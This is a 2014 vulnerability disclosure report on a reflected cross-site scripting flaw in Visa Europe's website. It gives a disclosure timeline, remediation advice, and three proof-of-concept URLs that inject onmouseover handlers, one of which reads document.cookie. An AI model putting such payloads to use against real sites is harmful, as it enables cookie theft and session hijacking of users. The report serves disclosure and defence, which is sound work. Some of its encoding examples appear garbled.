Visa Europe Cross Site Scripting

`Visa (Europe) Official Website Vulnerability  
  
=============================================  
  
Published Report: 07/02/2014  
  
  
Credits: Advanced Information Security Corporation, USA  
  
  
Severity: High/Critical (OWASP TOP 10)  
CVSS: 7.0  
  
Type: Web Application / Reflected Cross-Site Scripting Attack.  
  
Author: Nicholas Lemonias.  
  
  
  
Background  
=============================================  
  
Visa Europe Ltd is a membership association and cooperative of over 3,700  
European banks and other payment service providers that operate Visa  
branded products and services within Europe. Visa Europe provides  
electronic payment services for cardholders, businesses, and retailers. The  
company offers debit, credit, virtual and prepaid credit-cards. The  
business has developed to provide consulting and analytics services for  
merchant agents and service providers. The business also offers payment  
security knowledge to business and government.  
  
The company is headquartered in London with satellite offices in Austria,  
Belgium, Bulgaria, Czech Republic, Finland, France, Germany, Greece,  
Hungary, Ireland, Israel, Italy, the Netherlands, Norway, Poland, Portugal,  
Romania, Spain, Sweden, Switzerland and Turkey.  
  
  
  
  
  
Coordinated Vulnerability Disclosure Timeline  
  
  
=============================================  
  
25th of November, 2013 - Contacted Vendor regarding the security  
realisation.  
  
26th of November, 2013 - Vendor acknowledgement of the problem.  
  
2nd of December, 2013 - Problem verification.  
  
3rd of December, 2013 - Problem mitigation.  
  
  
  
Proof of Concept / Affected Services  
  
=============================================  
  
http://www.visaeurope.com/en/viewpoints.aspx?author=3%22%20onmouseover%3dprompt%28990207%29%20abc%3d%22&category=32&date=  
  
Affected directory: /en/viewpoints  
  
Injected Code to path fragment:  
/en/viewpoints.aspx?author=3%22%20onmouseover%3dprompt%28990207%29%20abc%3d%22&category=32&date="  
  
1. Escaping previous fragment function:  
2. Injection:  
onmouseover=onmouseover%3dprompt%2831337%29%20abc%3d%22&category=32&date="  
  
Description: On mouse over the affected link, and the injected code will be  
executed. In this Proof-of-concept a prompt will alter the user's normal  
execution flow.  
  
  
Proof-Of-Concept 2  
  
=============================================  
http://www.visaeurope.com/en/viewpoints.aspx?author=3%22%20onmouseover%3dalert%28990207%29%20abc%3d%22&category=32&date=  
  
Proof-Of-Concept 3  
  
=============================================  
http://www.visaeurope.com/en/viewpoints.aspx?author=3%22%20onmouseover%3dalert%28document.cookie%29%20bxc%3d%22&category=32&date=  
  
* This vulnerability was reported to the relevant security teams which acted  
immediately to mitigate the issues.  
  
  
  
Recommendations provided for Quality of Service  
  
=============================================  
  
A. The recommendations made to Visa Europe Inc. were to  
consider encrypting the view state of the application. Furthermore to  
implement a stronger Cross-Site Scripting protection.   
XSS filtering was not properly applied, and meta character filtering allowed data  
input to be altered, and third-party untrusted code to be executed.   
  
Please note that malicious users could take advantage of this vulnerability, as we have seen in malware and  
virus propagation instances.  
  
  
B. Our consultation to Visa Europe was therefore, for an immediate risk  
assessment and thus immediate review of upper-level security policies in  
accord to ISO 27001 and ISO 27002, best practise which was followed   
kindly by the team. Full review of ISMS policy scope and the SDLC of the vulnerable  
application and other subsidiary pages.  
  
  
Appendices  
============================  
A. Suggested the filtering of metacharacters.  
B. Suggested the utilisation User-server encoding of < and > to < and  
> in application output.  
C. An XSS attack could embrace mass user and product attacks, phishing;  
theft of private and confidential information such as credit cards,  
passwords, and stored accounts.  
D. Filtering < and > and using appropriate encoding methods.  
Citing an example ( and ) should be filtered and encoded to ( and ).  
  
Example 2:  
# and & converted to &#35 (#) and &#38 (&).  
  
  
References  
============================  
[1] OWASP. 2013. Cross Site Scripting (XSS) attacks, [ONLINE]  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS), 2011  
[2] OWASP. 2013. XSS Filter Evasion Cheat-Sheet, [ONLINE]  
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet?, 2013.  
[3] Microsoft. 2011. Protecting against XSS attacks. [ONLINE] Available at:  
http://msdn.microsoft.com/en-us/library/ff649310.aspx.  
  
  
  
** This vulnerability report is posted for the wider benefit of the  
security community, as is and without any warranties, including the  
warranty of merchantability and capability fit for a particular purpose.  
The information is posted under the FOI as per best security practice.  
  
  
[Copyright Advanced Information Security Corp ©, 2014]`